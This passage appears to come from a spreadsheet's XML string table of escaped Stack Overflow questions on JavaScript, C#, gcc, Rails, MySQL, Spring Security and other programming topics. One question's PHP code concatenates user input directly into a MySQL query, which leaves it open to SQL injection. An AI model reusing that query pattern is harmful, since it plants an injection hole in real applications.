&lt;p&gt;If myParam is not passed into MyFunc by the caller, then I want to set it to a default value.  But first I want to try and get it from another object, which may not yet exist: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function MyFunc(myParam) {
    if (!myParam) {
        if (!myObj) {
            myParam = 10;
        }
        else {
            myParam = myObj.myParam;
        }
    }
    alert(myParam);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I started to write:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    myParam = myParam || myObj.mParam || 10
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but realized that if myObj does not exist then this would fail.  I might guess the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    myParam = myParam || (myObj &amp;amp;&amp;amp; myObj.mParam) || 10
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It might even work.  But is it the best way?&lt;/p&gt;
&lt;p&gt;How would for example John Resig do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I ignore delegate parameters with lambda syntax?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am curious why C# allows me to ignore delegate parameters in some cases but not others.&lt;/p&gt;
&lt;p&gt;For instance this is permitted:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Action&amp;lt;int&amp;gt; action = delegate { Console.WriteLine("delegate"); };
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but this is not:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Action&amp;lt;int&amp;gt; action = () =&amp;gt; Console.WriteLine("lambda");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to initialize a delegate and ignore the parameters using a lambda?  I know that I can add a single parameter to the lambda and fix the previous line but this is more of an academic question pertaining to the compiler and why or how this works.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do you mean Ruby on Rails is not thread safe?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was just reading up on ROR (haven't dived into it yet), and I hear that it isn't thread safe. Obviously, this doesn't mean that more than one person can't access your site at one time, so what exactly does it mean? Where do threads come into play in ROR? Do they just mean the request handling?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Difference between -Wconversion between gcc and g++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/310108/can-i-make-gcc-warn-on-passing-too-wide-types-to-functions"&gt;Can I make GCC warn on passing too-wide types to functions?&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Consider the following test program:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void func(int a)
{
}
int main()
{
    unsigned int b = 42;
    func(b);
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Compiling it with gcc:&lt;/p&gt;
&lt;pre&gt;
lol@mac:~/projects$ gcc -Wconversion testit.c
testit.c: In function Ã¢mainÃ¢:
testit.c:11: warning: passing argument 1 of Ã¢funcÃ¢ as signed due to prototype
lol@mac:~/projects$
&lt;/pre&gt;
&lt;p&gt;But, in g++ there is no warning!:&lt;/p&gt;
&lt;pre&gt;
lol@mac:~/projects$ g++ -Wconversion testit.c
lol@mac:~/projects$
&lt;/pre&gt;
&lt;p&gt;What is the reason for this and is there any way to get the same warning when compiling C++ code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Asynchronous SQLCommand and CCR</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been playing with the demo code from this msdn article by &lt;a href="http://msdn.microsoft.com/en-au/magazine/cc163556.aspx" rel="nofollow"&gt;Jeffrey Richter&lt;/a&gt;.  &lt;/p&gt;
&lt;p&gt;I have added a new function to his ApmToCcrAdapters to handle the SqlCommand.BeginExecuteReader.  Only it is closing the reader before I can read it.&lt;/p&gt;
&lt;p&gt;The following code is used to provide a FromIteratorHandler:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    private static IEnumerator&amp;lt;ITask&amp;gt; AsyncReaderDemoHandler()
    {
       SqlDataReader reader = null;
       SqlConnection connection = new SqlConnection(@"Data Source=.\SQLEXPRESS;Initial Catalog=BizData;Integrated Security=True;Async=True;");
       string query = "SELECT * FROM Account;";
       SqlCommand command = new SqlCommand(query,connection);
       connection.Open();
       yield return Arbiter.Choice(ApmToCcrAdapters.GetReader(command),
          delegate(SqlDataReader r) { Msg("Got SQL data"); reader = r; },
          delegate(Exception e) { Msg("Failed to get SQL data"); });
       connection.Close();
       if (reader == null) yield break;
       //This is where the code fails: Reader is Closed!
       while (reader.Read())
       {
           Console.WriteLine(reader["Account"]);
       }
   }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which in turn calls the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   /// &amp;lt;summary&amp;gt;
   /// Gets the Reader, requires connection to be managed
   /// &amp;lt;/summary&amp;gt;
   public static PortSet&amp;lt;SqlDataReader, Exception&amp;gt; GetReader(SqlCommand sqlCommand)
   {
       Port&amp;lt;SqlDataReader&amp;gt; portResponse = null;
       Port&amp;lt;Exception&amp;gt; portException = null;
       GetReaderResponse(sqlCommand, ref portResponse, ref portException);
       return new PortSet&amp;lt;SqlDataReader, Exception&amp;gt;(portResponse, portException);
   }
   // Wrapper for SqlCommand's GetResponse
   public static void GetReaderResponse(SqlCommand sqlCom,
      ref Port&amp;lt;SqlDataReader&amp;gt; portResponse, ref Port&amp;lt;Exception&amp;gt; portException)
   {
       EnsurePortsExist(ref portResponse, ref portException);
       sqlCom.BeginExecuteReader(ApmResultToCcrResultFactory.Create(
          portResponse, portException,
          delegate(IAsyncResult ar) { return sqlCom.EndExecuteReader(ar); }), null);
   }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Javascript on page is not executing before AJAX onComplete event is called</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a form that makes an Ajax POST request to insert a widget into my database.  In the form, I have a select box where you can select from the widgets.  After the db insert is made, I must update the select box.  I actually just replace the entire form for now.  &lt;/p&gt;
&lt;p&gt;Because the select box has the widgets, I must have a copy of the objects in javascript.  I call this var widget_objects.  When the form is replaced during the update event, I print the ruby variable &amp;lt;%= @widget_objects %&gt; and I can see the newly created object.  However, when I try to access the javascript var "widget_objects" in the onComplete event, the new object does not exist.  I create the javascript widget_objects with this line of code on the page:
widget_objects = &amp;lt;%= @widget_objects %&gt;;&lt;/p&gt;
&lt;p&gt;So it seems that the line of code above is not executed before Ajax request's onComplete event. However, I thought the onComplete event occurs after the page has been loaded, and I would assume after scripts are eval'd....any ideas?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%= submit_to_remote( 
					"save_widget", 
					"Save Widget &amp;amp; Generate Embed Code", 
					{
						:url =&amp;gt; widgets_url(:user_id =&amp;gt; @user.id),
						:update =&amp;gt; "widget_form",
						:method =&amp;gt; :POST,
						:html =&amp;gt; { 	:id =&amp;gt; "save_widget_button", 
									:onclick =&amp;gt; "this.value='Saving...'; this.disabled = 'true';",
									:style =&amp;gt; "width: 220px;"
								 }, 
						:complete =&amp;gt;"
							$('save_widget_button').disabled=''; 
							$('save_widget_button').value='Save Widget &amp;amp; Generate Embed Code';
							var last_id = $j('select#widget_id').children(':last').attr('value');
							alert( widget_objects[last_id] );
							",
						:success =&amp;gt; "reportMessage('success', request.headerJSON.success, 'save_widget_status'); $('band_form').reset();",
						:failure =&amp;gt; "reportMessage('failure', request.headerJSON.errors, 'save_widget_status');"
					}) %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>JavaScript 64 bit numeric precision</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to represent a number with higher than 53-bit precision in JavaScript? In other words, is there a way to represent 64-bit precision number?&lt;/p&gt;
&lt;p&gt;I am trying to implement some logic in which each bit of a 64-bit number represents something. I lose the lower significant bits when I try to set bits higher than 2^53.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Math.pow(2,53) + Math.pow(2,0) == Math.pow(2,53)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to implement a custom library or something to achieve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create history of states in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to save a history of states over a few actions in a Java application, which I can later reload in order to restore the state at a certain action. In other words I have a screen which has a state associated with it and I need to store it as well as any changes in a history so that I can restore the state of the screen at any time. This is kind of like 'undo' but not exactly as the difference between two state can be very large and there are no well-defined actions that changes the states.&lt;/p&gt;
&lt;p&gt;Let me explain with an example:
A very basic screen state might just contain a single Map. In state A this Map contains a reference to "Object1" with key "Key1" and "Object2" with key "Key2". In state B the Map still contains the reference to "Object1", but "Object2" has been modified and an "Object3" has been added. I now need to be able to return to state A, which would involve "dropping" Object3 and restoring Object2 to its previous state. I cannot define any custom "undo actions" as I do not know what changes were made to Object2 or even what the type of Object2 is. Further, because the reference remains the same for Object2 in state A and B, those changes are reflected in state A so Object2 isn't the same as it was.&lt;/p&gt;
&lt;p&gt;I realize the best solution is to implement clone methods, but as I need to support all types of Objects (including primitives and standard collections) this isn't feasible. I thought about using serializable, where I would serialize the Map as soon as a state transition happens and then deserialize it when it is needed again, but it seems like a very ugly solution.&lt;/p&gt;
&lt;p&gt;Does anybody have any other ideas?
Thank you,
Ristretto&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DynamicArray throws OutOfBounds exception</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know this may sound strange, but yes, it's 2009 and I need to write small application using BCB5 :) &lt;/p&gt;
&lt;p&gt;The problem is that DynamicArray throws OutOfBound exception when trying to expand it from within worker thread.&lt;/p&gt;
&lt;p&gt;I have global variable, let's say &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DynamicArray&amp;lt;double&amp;gt; X;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In main thread I check the length of array and I get 0, which is OK (length wasn't set)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Application-&amp;gt;MessageBox(itoa(X.Length,str , 10), "", MB_OK);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Below is my worker thread class&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class ArrayModifierThread : public TThread
{
private:
DynamicArray&amp;lt;double&amp;gt; __thread X;
protected:
void __fastcall Execute();
public:
__fastcall ArrayModifierThread(bool CreateSuspended);
 void setX(DynamicArray&amp;lt;double&amp;gt; &amp;amp;a);
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So far so good. Next I create new thread:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ArrayModifierThread *t = new ArrayModifierThread(true);
t-&amp;gt;setX(X); // Pass reference to my global DynamicArray
t-&amp;gt;Resume();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here the Execute() method gets executed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void __fastcall ArrayModifierThread::Execute()
{
 X.Length = 10;
 X[5] = 45.5;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I'd expect is that global array is expanded and 6th element gets value of 45.5.&lt;/p&gt;
&lt;p&gt;But closer investigation from within main thread gives Length = 0 and ArrayOfBounds Exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; Application-&amp;gt;MessageBox(itoa(__X.Length,str , 10), "", MB_OK);
 Application-&amp;gt;MessageBox(itoa(__X[5],str , 10), "", MB_OK);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Could anybody tell me what I've missed? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Excel import returns blank cells</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have had this problem forever and never managed to figure it out. &lt;/p&gt;
&lt;p&gt;I am importing an excel (.xls) file into an asp recordset. Most of the time this works great. &lt;/p&gt;
&lt;p&gt;I have column with the following values&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;4
4
5,6
3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Asp reads those values in except for the 5,6. I have tried formatting the cells and this makes no difference. It appears that asp (or excel) are trying to determine the type of the cell by examining the value. For whatever reason it then throws this hiccup if some of the cells aren't the same format as the majority of the other are. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the performance implications of getElementsByTagName("*")?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let me start out by saying that I'm not a JavaScript developer so this question may be rather basic.&lt;/p&gt;
&lt;p&gt;When simulating IE's nonstandard &lt;a href="http://msdn.microsoft.com/en-us/library/aa752281(VS.85).aspx" rel="nofollow"&gt;&lt;code&gt;all&lt;/code&gt;&lt;/a&gt; property I'm using &lt;code&gt;getElementsByTagName("*")&lt;/code&gt;, is there a significant performance difference between both methods?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Caching system like memcached but where I need to list what is in the cache</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best caching system/daemon that supports get, put, delete and list (memcached, I think, doesn't support list)&lt;/p&gt;
&lt;p&gt;An example &lt;/p&gt;
&lt;p&gt;I would like to use memcached for my caching solution but I'm stuck with the application design that I currently have which is that I cache  the following 3 URLs I need to always have different cache keys.  That stops me from just declaring a list of URL params with which I could generate a cache item for.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;/badappdesign?iod=3&lt;/li&gt;
&lt;li&gt;/badappdesign?iod=3&amp;amp;h=23&lt;/li&gt;
&lt;li&gt;/badappdesign?iod=3&amp;amp;dsfj=435&amp;amp;dasv=342&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this instance iod=3 has changed so I need to clear all the keys that contain iod=3&lt;/p&gt;
&lt;p&gt;I currently cache to a db and have to do a fairly expensive like '%iod=3%'&lt;/p&gt;
&lt;p&gt;what can help?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>selenium-maven-plugin</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i'm trying to set up the selenium-maven-plugin and having some difficulties i hope somebody can help me. My configuration looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;plugin&amp;gt;
  &amp;lt;groupId&amp;gt;org.codehaus.mojo&amp;lt;/groupId&amp;gt;
  &amp;lt;artifactId&amp;gt;selenium-maven-plugin&amp;lt;/artifactId&amp;gt;
  &amp;lt;executions&amp;gt;
    &amp;lt;execution&amp;gt;
      &amp;lt;phase&amp;gt;pre-integration-test&amp;lt;/phase&amp;gt;
      &amp;lt;goals&amp;gt;
    &amp;lt;goal&amp;gt;start-server&amp;lt;/goal&amp;gt;
    &amp;lt;goal&amp;gt;selenese&amp;lt;/goal&amp;gt;
      &amp;lt;/goals&amp;gt;
      &amp;lt;configuration&amp;gt;
    &amp;lt;background&amp;gt;true&amp;lt;/background&amp;gt;
    &amp;lt;browser&amp;gt;*firefox&amp;lt;/browser&amp;gt;
    &amp;lt;results&amp;gt;src/test/resources/selenium/result.html&amp;lt;/results&amp;gt;
    &amp;lt;startURL&amp;gt;http://localhost/MyProject&amp;lt;/startURL&amp;gt;
    &amp;lt;suite&amp;gt;src\test\resources\selenium\Testsuite.html&amp;lt;/suite&amp;gt;
      &amp;lt;/configuration&amp;gt;
    &amp;lt;/execution&amp;gt;
  &amp;lt;/executions&amp;gt;
&amp;lt;/plugin&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have cargo setup as well which works perfectly. However the start-server goal runs without problems but when maven tries to execute the selenium:selenese goal i get this exception: Could not find matching constructor for: org.openqa.selenium.server.SeleniumServer(java.lang.Integer, java.lang.Boolean, java.lang.Boolean)&lt;/p&gt;
&lt;p&gt;An suggestions? Thanks in advance for your help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How we can show UIViewController and UIView by using Cocos2d?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to build an iPhone app by using Cocos2d.But i have used four types of classes
like bellow-&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@interface MenuScene : Scene {}
@end
@interface FlipView : UIImageView
{
    CGPoint startTouchPosition;
    NSString *dirString;
    UIImageView *firstPieceView;   
    UIImageView *secondPieceView;
}
@end
@interface HelloController : UIViewController
@end
@interface MenuLayer: Layer{
        Todo *todo;
        Menu * menu;
        sqlite3 *database;
        NSMutableArray *todos;
    NSString *dirString;
    CGPoint startTouchPosition;
}
@property (nonatomic, retain) NSMutableArray *todos;
-(void) button1: (id)sender;
-(void) button2: (id)sender;
-(void) black_jack: (id)sender;
@end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but how can i show FlipView and HelloController class through MenuLayer class.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simulate build provider in ASP.NET Web Application (.Net 2.0)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working with .Net 2.0 ASP.NET Web Application.&lt;/p&gt;
&lt;p&gt;I am programmatically creating an assembly containing namespace and classes specified within xml file in the web application.
I have created a separate library that does that, I get the assembly and that's fine.&lt;/p&gt;
&lt;p&gt;But I don't want to reference this as a precompiled component.&lt;/p&gt;
&lt;p&gt;I want to create it on the fly, so when I run the build of the web application, the assembly is built, the reference to the assembly added and then the web application code can use it further. Plus, I can have the intellisense.&lt;/p&gt;
&lt;p&gt;Now this is exactly the scenario for the build providers, but the problem is that the build providers don't work with this type of application.&lt;/p&gt;
&lt;p&gt;I have managed to run the assembly generation tool like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Target Name="BeforeBuild"&amp;gt;
  &amp;lt;Exec Command="CreateAssembly.exe config.xml"/&amp;gt;
&amp;lt;/Target&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But no luck with dynamically referencing the generated assembly..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Object must be locked to be used?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was pondering language features and I was wondering if the following feature had been implemented in any languages.&lt;/p&gt;
&lt;p&gt;A way of declaring that an object may only be accessed within a Mutex. SO for example in java you would only be able to access an object if it was in a synchrnoised block and in C# a Lock.&lt;/p&gt;
&lt;p&gt;A compiler error would ensue if the object was used outside of a Mutex block.&lt;/p&gt;
&lt;p&gt;Any thoughts?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I think some people have misunderstood the question, I'm not asking if you can lock objects, I'm asking if there is a mechanism to state at declaration of an object that it may only be accessed from within a lock/synchronised statement.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL sorting the result using a field of a different table</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 3 tables of the following structure&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    products
    {
        pid
        pname
        plocation...
    }
    services
    {
        s_id
        s_name
        s_location...
    }
    txn
    {
        tid
        pid...
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am using the following query to get the values I require.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    $dbquery = "SELECT DISTINCT products.pid AS id,
                   products.pname AS name,
                   products.p_desc AS description,
                   products.p_loc AS location,
                   products.category AS category,
                   products.p_uid AS userid,
                   products.add_date AS dateadded,
                   products.isaproduct AS whatisit
              FROM products
             WHERE products.pname
              LIKE '%".$keyword."%'
               AND category = '".$refine_value."'
             UNION
             SELECT DISTINCT services.s_id AS id,
                   services.s_name AS name,
                   services.s_desc AS description,
                   services.s_category AS category,
                   services.s_uid AS userid,
                   services.s_location AS location,
                   services.date_added AS dateadded,
                   services.isaservice AS whatisit
              FROM services
             WHERE services.s_name
              LIKE '%".$keyword."%'
               AND s_category = '".$refine_value."'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I need to order the values I select by getting the count of pid in txn table which I get in the query above.&lt;/p&gt;
&lt;p&gt;How can I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Writing standards for unit testing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I plan to introduce a set of standards for writing unit tests into my team. But what to include?&lt;/p&gt;
&lt;p&gt;These two posts (&lt;a href="http://stackoverflow.com/questions/155436/unit-test-naming-best-practices"&gt;Unit test naming best practices&lt;/a&gt; and &lt;a href="http://stackoverflow.com/questions/377423/best-practices-for-file-system-dependencies-in-unit-integration-tests"&gt;Best practices for file system dependencies in unit/integration tests&lt;/a&gt;) have given me some food for thought already.&lt;/p&gt;
&lt;p&gt;Other domains that should be covered in my standards should be how test classes are set up and how to organize them. For example if you have class called OrderLineProcessor there should be a test class called OrderLineProcessorTest. If there's a method called Process() on that class then there should be a test called ProcessTest (maybe more to test different states).&lt;/p&gt;
&lt;p&gt;Any other things to include?&lt;/p&gt;
&lt;p&gt;Does your company have standards for unit testing?&lt;/p&gt;
&lt;p&gt;EDIT: I'm using Visual Studio Team System 2008 and I develop in C#.Net&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Publishing my ASP.NET site ruins the Subversion files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to use SVN to deploy my asp.net site to production. My workflow is:&lt;/p&gt;
&lt;p&gt;Setup:
Publish Site to FolderX,
Import FolderX to SVN,
Update web server production folder with the repository for FolderX.&lt;/p&gt;
&lt;p&gt;Everyday:
Publish updated site to FolderX,
Commit Changes,
Update remote server with changes.&lt;/p&gt;
&lt;p&gt;That's the theory, but when I publish the site again to FolderX, it destroys the .svn folders that are inside all the site subfolders.&lt;/p&gt;
&lt;p&gt;How can prevent that from happening?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Message / confirm dialog</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a need for a confirm message box from a button click, but only on some conditions. I am cheking two values on the aspx.page, and if one is higher than another, I need a confirmation from the user. Are there any ( simple) way of doing this ? I have been reading about javascript and alert messages, but I cant seem to figure out this one....
I am using RadStudio 2007, .net application.&lt;/p&gt;
&lt;p&gt;Any help are appriciated.
Anja&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I use a Checkbox on a form to add a record into a subform in Microsoft Office Access?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a database for a carpet company. I have a form which enables the user to make a quote, including choosing the customer, etc. There is a also subform dealing with the products and extras, with quantities and unit prices. To state whether the user requires fitting there is a checkbox. When ticked I would like fitting to be added in the subform as one of the products. Products are normally manually chosen using a dropdown.&lt;/p&gt;
&lt;p&gt;Important properties are:&lt;br /&gt;
Form name: &lt;strong&gt;Orders&lt;/strong&gt;&lt;br /&gt;
Subform name: &lt;strong&gt;Order Details Subform&lt;/strong&gt;&lt;br /&gt;
Checkbox name: &lt;strong&gt;Fitting&lt;/strong&gt;&lt;br /&gt;
Field name for products: &lt;strong&gt;Product ID&lt;/strong&gt;&lt;br /&gt;
Subform linked to table: &lt;strong&gt;Order Details&lt;/strong&gt;&lt;br /&gt;
Form linked to table: &lt;strong&gt;Orders&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I'm assuming VBA is needed, or the macro builder.&lt;/p&gt;
&lt;p&gt;Anyway thanks in advance!!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The while language</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For my theory of computing languages class, we got a homework assignment to implement a piece of code in a language that only has while statements for flow control (no if statements).  This is mainly to prove that you can write a Turing-complete language with only a while loop.&lt;/p&gt;
&lt;p&gt;For those of you who can understand language grammars, here are the language rules:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;S -&amp;gt; S;S | while C do S od | id := E
E -&amp;gt; E + T | T | E - T
T -&amp;gt; T * F | F | F / T
F -&amp;gt; id | cons | (E)
C -&amp;gt; E = E | E &amp;gt; E | E &amp;lt; E | E &amp;gt;= E | E &amp;lt;= E | E != E | C and C | C or C | not(C)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is copied from my class notes, so don't blame me if something is missing or incorrect!&lt;/p&gt;
&lt;p&gt;The piece of code to implement is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if d = 0 do
    x := 1
else
    x := a / d
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At any rate, if you want to go ahead and write that using the language rules above, go ahead.  Otherwise, go ahead and write it in whatever language you're most comfortable in.  But there are a few caveats!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;No if statements or any other kind of flow control other than while loops.&lt;/li&gt;
&lt;li&gt;No cheating:  the grammar above doesn't include any break statements, return statements, or exceptions.  Don't use them.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I've got my piece of code written for this (which I'll post just to prove this isn't a show me teh codez post).  I'm kinda curious what anyone else can come up with though.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Button image too far from top of button; too close to bottom of button</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a Windows Form in VB.NET 2005 and I would like to have some buttons with images (I'm talking about the plain, vanilla System.Windows.Forms.Button).  I have everything set up the way I want it but the images are displaying too low on the button, such that the bottom of the icon is almost right on the bottom of the button and there is a lot of space above the image.  &lt;/p&gt;
&lt;p&gt;Here is a screenshot:&lt;br /&gt;
&lt;img src="http://www.freeimagehosting.net/uploads/b28a5c63b8.jpg" alt="Button Screenshot" /&gt;&lt;/p&gt;
&lt;p&gt;See how the corner of the icon is brushing up against the bottom of the button?&lt;/p&gt;
&lt;p&gt;My button is 23 pixels high and the image is a 16 x 16 icon (converted to a bitmap so that it can be assigned to the button's Image property).&lt;/p&gt;
&lt;p&gt;I've tried setting the button's Margin.All property to 0, and verified that the Padding.All property is 0.  I've also tried changing the button's ImageAlign to TopLeft, MiddleLeft, and BottomLeft, but none of those settings seem to have any affect.  &lt;/p&gt;
&lt;p&gt;Does anyone know how I can position the image to be of equal distance from the top and bottom edges of the button?  I can resize the button or the image if necessary but they are at my preferred size and I would like to keep them that way if possible.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server 2005 Reporting Services - Pros and Cons</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a web application using ASP .NET 2.0, VS 2008 and SQL Server 2005. I would like to Use SSRS 2005 for the various reports I need to build for this web application. I would like to convince the team that we should adopt SSRS as the main reporting platform for most internal and external web applications we have. &lt;/p&gt;
&lt;p&gt;What are the pros and cons of Reporting Services? I can see many pros like tight integration with IIS, SQL Server and Visual Studio, rich presentation features and export functionality, subscription etc so I am mainly interested in negatives of SSRS.&lt;/p&gt;
&lt;p&gt;EDIT: I understand that if I am not using VS 2005 for my application development, I will be using different Visual Studio versions for application and report development. However, I am more interested in negatives (or not so good aspects) of SSRS itself.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Load Balancing, Spring Security, ConcurrentSessionFilter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Spring 2.5.6/Flex application setup and running with Spring Security 2.0.4. Recently a load balancer (A Foundry ServerIron 4g &lt;a href="http://www.foundrynet.com/products/a...ems/si-4g.html" rel="nofollow"&gt;http://www.foundrynet.com/products/a...ems/si-4g.html&lt;/a&gt;) was put into place and now I am getting cross domain errors. Basically the load balancer is firing off a request to myloadbalancer.abc.com and myrealserver1.abc.com is being returned as the domain name. Spring security is forwarding the request to the real server somehow. How can I get around this?&lt;/p&gt;
&lt;p&gt;Also the ConcurrentSessionFilter is no longer working. The application is set up to disable concurrent logons, but this functionality stopped after the application was put behind the load balancer. I believe there are multiple Oracle Application Servers being clustered together as well. I have never dealt with clustering or load balancers before and I wasn't aware that the software had to be written differently in certain areas.&lt;/p&gt;
&lt;p&gt;These sound like separate issues to me, but I need help for both.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does IEnumerable&lt;TSource&gt; Concat&lt;TSource&gt; preserve the order of elements?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assume two lists, A and B so that A = (1,2,3) and B = (4,5,6). Will A.Concat(B) preserve the order so that the result is (1,2,3,4,5,6)? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get the Localizable property and support in my own design tool?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;Overview&lt;/h3&gt;
&lt;p&gt;In another question, I asked about &lt;a href="http://stackoverflow.com/questions/205138/globalizing-runtime-generated-assemblies"&gt;deploying localizations for some runtime compiled &lt;code&gt;UserControl&lt;/code&gt;'s&lt;/a&gt;. However, before I can get to deploying the localizations, I need a way of localizing the controls.&lt;/p&gt;
&lt;h3&gt;Background&lt;/h3&gt;
&lt;p&gt;The controls are created by our own WinForms-style designer (using .NET's support for design surfaces, etc.) and saved as a binary format that combines the &lt;code&gt;CodeCompileUnit&lt;/code&gt;, resource resx, and user source into one file. These files are then compiled into an assembly as appropriate at runtime by another tool.&lt;/p&gt;
&lt;p&gt;In order to localize these, we need to tell the designer and serialization that localizable property values are to be stored in the resources. The VisualStudio WinForms designer does this using an extension property called &lt;code&gt;Localizable&lt;/code&gt; and an associated property for specifying the default culture. We need this property in our custom designer, if possible.&lt;/p&gt;
&lt;h3&gt;Constraints&lt;/h3&gt;
&lt;p&gt;We need our standalone designer tool that is easy to use for non-developer types as well as restricting certain actions so using a free edition of Visual Studio (i.e. C# Express) is not going to work (I've already pitched it and failed); therefore, any solution to how we localize these UserControl's needs to compensate for this.&lt;/p&gt;
&lt;h3&gt;Question&lt;/h3&gt;
&lt;p&gt;Can we get the Localizable support into our custom WinForms designer?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If yes, how?&lt;/li&gt;
